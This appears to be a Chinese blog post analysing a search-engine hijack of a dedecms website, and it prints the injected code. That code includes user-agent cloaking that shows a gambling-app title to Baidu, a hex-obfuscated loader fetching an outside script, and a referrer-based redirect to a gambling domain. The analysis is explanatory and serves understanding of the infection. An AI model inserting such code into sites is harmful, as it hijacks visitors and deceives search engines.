文章时间:2019年9月20日 18:48:13
解决问题:百度快照劫持代码实战分析
使用程序:dedecms(织梦)
<script>
if (navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1) { document.title = "{dede:global.cfg_webname/}" }
</script>这段JS里面包含一个判断,根据userAgent来判断,如果不是百度来的,那就显示dedecms本身的标题,所以这也就是为什么我们直接打开网页,(输入网址的方式打开)而显示正常标题的原因。
<title>押庄龙虎_押庄龙虎棋牌下载-官网手机app下载平台</title>这段代码采用的是Unicode编码,解码以后,是“押庄龙虎_押庄龙虎棋牌下载-官网手机app下载平台”这一行代码,搞懂了。
< script type = "text/javascript" >
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x68\x75\x66\x68\x32\x2e\x63\x6f\x6d\x2f\x63\x78\x63\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'); < /script>解密出来就是这段话
< script type = "text/javascript" >
window["document"]["write"]('<script type="text/javascript" src="https://sfhufh2.com/cxc.js"></script>'); < /script>意思是向首页中插入这行代码
具体的跳转原因是因为他插入的是一个js文件,所以js文件被执行了。
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?5389c7fc17035dfab2ade749b0b79e96";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
(function () {
/*百度推送代码*/
var bp = document.createElement('script');
bp.src = '//push.zhanzhang.baidu.com/push.js';
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
/*360推送代码*/
var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';
document.write('<script src="' + src + '" id="sozz"><\/script>');
})();
document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://tz33720.com/\";");
document.writeln("</script>");这代js写的很厉害啊,就这样完成了他们网站的优化,瞬间全网排名第一非常nice!
吐槽:这些黑帽子把百度的脸打的啪啪作响,大脑摁在地上疯狂摩擦,而百度啥都干不了,只能瞪眼看着,瞅着。百度提供的技术,简直就是黑产灰产的福利,难怪原先BTA 现在没有你,不造福人类,你早晚灭亡。